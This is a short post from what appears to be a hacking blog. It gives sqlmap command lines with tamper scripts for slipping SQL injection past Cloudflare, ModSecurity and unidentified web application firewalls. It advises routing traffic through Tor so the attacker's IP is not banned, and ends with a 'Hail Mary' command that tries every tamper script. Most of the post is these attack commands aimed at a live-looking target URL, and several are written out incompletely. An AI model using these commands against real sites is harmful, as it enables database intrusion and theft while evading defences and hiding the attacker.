Tutorials | Challenges | Tools | Downloads | Resources | Documentaries

Bypass CloudFlare, ModSecurity, & Unidentifed WAFs | SQL Injections | SQLMAP

bypass cloudflare


If  SQLMAP informs you that the target is protected by a WAF/IPS/IDS, it can be difficult to perform the injection.
Checking for a possible WAF can be done by using the --indentify-waf switch. If there is one in place, the three mostly likely results are:
  • Cloudflare
  • Mod Security
  • Unidentified
--tor switch should also be used to avoid having you IP address banned.


[success title="Cloudflare bypass" icon="check-circle"]https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="between,randomcase,space2comment" [/success] [update title="Mod Security bypass" icon="check-circle"]https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned" [/update] I find that Mod Security scripts work well for 'Unidentified'. [error title="Unidentified bypass" icon="check-circle"]https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned" [/error]
If you want to be noisy and try every script available, you can do the following. Make sure you have the latest version of SQLMAP.
[alert title="Hail Mary" icon="info-circle"] https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" [/alert]
Labels:
Reactions:

Post a Comment

[blogger]

GrayHatHackers

{twitter https://twitter.com/ghhackers}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget